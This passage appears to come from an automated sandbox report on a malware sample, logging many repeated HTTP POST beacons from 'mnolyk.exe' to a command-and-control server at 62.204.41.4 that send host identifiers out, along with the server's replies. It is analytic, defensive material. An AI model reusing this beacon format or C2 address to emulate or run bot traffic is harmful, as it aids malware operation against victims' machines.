                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:36.084789991 CET736INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          582192.168.2.65030762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:36.268284082 CET737OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:36.332087040 CET737INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          583192.168.2.65030862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:36.533930063 CET738OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:36.598963976 CET738INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          584192.168.2.65030962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:36.772736073 CET739OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:36.837404966 CET739INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          585192.168.2.65031062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:37.027404070 CET740OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:37.092389107 CET740INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:37 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          586192.168.2.65031162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:37.282021999 CET741OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:37.346067905 CET741INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:37 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          587192.168.2.65031262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:37.521186113 CET742OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:37.584707975 CET742INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:37 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          588192.168.2.65031362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:37.774354935 CET743OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:37.840990067 CET743INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:37 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          589192.168.2.65031462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:38.017064095 CET744OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:38.083966017 CET744INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          59192.168.2.64977962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:05.232359886 CET179OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:05.296737909 CET179INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          590192.168.2.65031562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:38.266612053 CET745OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:38.330622911 CET745INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          591192.168.2.65031662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:38.501750946 CET746OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:38.566030025 CET746INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          592192.168.2.65031762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:38.748559952 CET747OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:38.814222097 CET747INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          593192.168.2.65031862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:38.985318899 CET748OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:39.050878048 CET748INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:39 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          594192.168.2.65031962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:39.222800016 CET749OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:39.286186934 CET749INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:39 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          595192.168.2.65032062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:39.480009079 CET750OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:39.544099092 CET750INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:39 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          596192.168.2.65032162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:39.741322994 CET751OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:39.805164099 CET751INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:39 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          597192.168.2.65032262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:39.988883018 CET752OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:40.054217100 CET752INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          598192.168.2.65032362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:40.235917091 CET753OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:40.301186085 CET753INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          599192.168.2.65032462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:40.470050097 CET754OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:40.533003092 CET754INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          6192.168.2.64972462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:52.311391115 CET111OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:52.376157045 CET111INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          60192.168.2.64978062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:05.481040001 CET180OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
